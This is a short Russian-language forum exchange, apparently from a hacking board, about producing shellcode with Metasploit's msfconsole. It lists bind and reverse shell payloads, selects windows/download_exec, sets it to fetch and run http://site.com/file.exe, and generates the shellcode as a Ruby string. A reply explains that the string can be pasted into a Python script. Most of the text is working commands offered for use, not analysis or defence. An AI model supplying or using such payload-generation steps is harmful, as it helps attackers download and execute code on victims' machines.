Устанаваливаешь metasploit (думаю не надо описывать как это делать)
Запускаешь
Цитата:
$ msfconsole
msf > show payloads # Просматриваешь все шелкоды
Payloads
========
Name Rank Description
---- ---- -----------
aix/ppc/shell_bind_tcp normal AIX Command Shell, Bind TCP Inline
windows/x64/shell_reverse_tcp normal Windows x64 Command Shell, Reverse TCP Inline
windows/x64/vncinject/bind_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Bind TCP Stager
windows/x64/vncinject/reverse_tcp normal Windows x64 VNC Server (Reflective Injection), Windows x64 Reverse TCP Stager
msf > info windows/download_exec # Просматриваешь информацию о шелкоде
...
msf> use windows/download_exec # выбираешь понравившийся тебе шелкод
msf payload(download_exec) > set URL http://site.com/file.exe # устанавливаешь параметры шелкода
msf payload(download_exec) > generate -t ruby # генерируешь шелкод под ruby синтаксис(т.к. для питоновского нет, но ruby похож на него)
ну или все перечисленное можно сделать в одну команду
Ммм оч интересн overxor неподскажешь шелл на руби будет пахать в питоновском скрипте? Просто я помню что на http://metasploit.com:55555/PAYLOADS была прямо вкладка Руби
Шел не на руби, он подготовлен для использование в руби(Тобишь ctrl+c ctrl+v). Что тебе мешает эту строку присвоить переменной в питоне и использовать ее?